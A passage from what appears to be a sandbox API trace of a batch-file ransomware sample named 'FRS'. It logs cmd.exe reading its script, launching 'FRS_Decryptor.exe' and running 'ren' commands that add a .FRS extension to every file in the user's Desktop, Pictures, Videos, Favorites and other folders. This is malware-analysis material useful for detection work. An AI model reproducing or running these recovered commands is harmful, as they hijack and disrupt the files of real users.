_String2="delims=", _MaxCount=0x7) returned 0 [0083.257] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0083.261] feof (_File=0x76ea4c68) returned 0 [0083.261] ferror (_File=0x76ea4c68) returned 0 [0083.261] fgets (in: _Buf=0xd81d40, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0083.712] feof (_File=0x76ea4c68) returned 0 [0083.712] ferror (_File=0x76ea4c68) returned 0 [0083.712] fgets (in: _Buf=0xd8708e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0083.751] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0083.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0083.752] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0083.752] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.752] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0083.752] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0083.752] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.752] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0083.752] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.752] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0083.753] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] GetFileType (hFile=0x2a0) returned 0x1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0083.753] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0083.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] GetFileType (hFile=0x2a0) returned 0x1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0083.753] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0083.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] GetFileType (hFile=0x2a0) returned 0x1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0083.753] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.753] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.753] GetFileType (hFile=0x2a0) returned 0x1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.753] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.753] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0083.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0083.754] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.754] GetFileType (hFile=0x2a0) returned 0x1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0083.754] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0083.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0083.754] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.754] GetFileType (hFile=0x2a0) returned 0x1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0083.754] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0083.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0083.754] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.754] GetFileType (hFile=0x2a0) returned 0x1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0083.754] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0083.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0083.754] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.754] GetFileType (hFile=0x2a0) returned 0x1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0083.754] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.754] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0083.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0083.755] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.755] GetFileType (hFile=0x2a0) returned 0x1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0083.755] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0083.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0083.755] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.755] GetFileType (hFile=0x2a0) returned 0x1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0083.755] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0083.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0083.755] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.755] GetFileType (hFile=0x2a0) returned 0x1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0083.755] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0083.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0083.755] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.755] GetFileType (hFile=0x2a0) returned 0x1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0083.755] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.755] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0083.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0083.756] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.756] GetFileType (hFile=0x2a0) returned 0x1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0083.756] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0083.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0083.756] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.756] GetFileType (hFile=0x2a0) returned 0x1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0083.756] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0083.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0083.756] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.756] GetFileType (hFile=0x2a0) returned 0x1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0083.756] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0083.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0083.756] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.756] GetFileType (hFile=0x2a0) returned 0x1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0083.756] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.756] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0083.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0083.757] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.757] GetFileType (hFile=0x2a0) returned 0x1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0083.757] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0083.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0083.757] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.757] GetFileType (hFile=0x2a0) returned 0x1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0083.757] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0083.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0083.757] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.757] GetFileType (hFile=0x2a0) returned 0x1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0083.757] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0083.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0083.757] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.757] GetFileType (hFile=0x2a0) returned 0x1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0083.757] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.757] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0083.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0083.758] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.758] GetFileType (hFile=0x2a0) returned 0x1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0083.758] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0083.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0083.758] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.758] GetFileType (hFile=0x2a0) returned 0x1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0083.758] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 